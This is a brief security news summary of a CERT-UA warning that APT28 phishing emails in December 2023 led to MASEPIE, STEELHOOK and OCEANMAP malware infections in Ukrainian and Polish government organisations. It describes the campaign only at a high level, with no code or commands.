APT28's End-of-Year Cyber Onslaught Takes Aim at Ukrainian and Polish Government Systems

CERT-UA warns of a phishing campaign orchestrated by the Russian state-sponsored APT28 leading to a malware attack on Ukrainian government systems. This campaign was active between December 15th to 25th, 2023 with the distribution of phishing emails targeting Ukrainian government organizations. CERT-UA notes "cases of similar attacks have also been recorded in relation to Polish organizations." These phishing emails redirect victims to malicious websites that downloaded a shortcut file, initiating an infection chain using PowerShell. The malware, named MASEPIE, downloaded additional tools like STEELHOOK for data theft from web browsers, and OCEANMAP, a C# backdoor for executing commands. These activities, combined with network reconnaissance tools like IMPACKET and SMBEXEC, enabled rapid lateral movement within compromised networks. Based on the tactics, techniques, and procedures (TTPs) demonstrated in the campaign, CERT-UA attributes the activity aligns with APT28's known TTPs.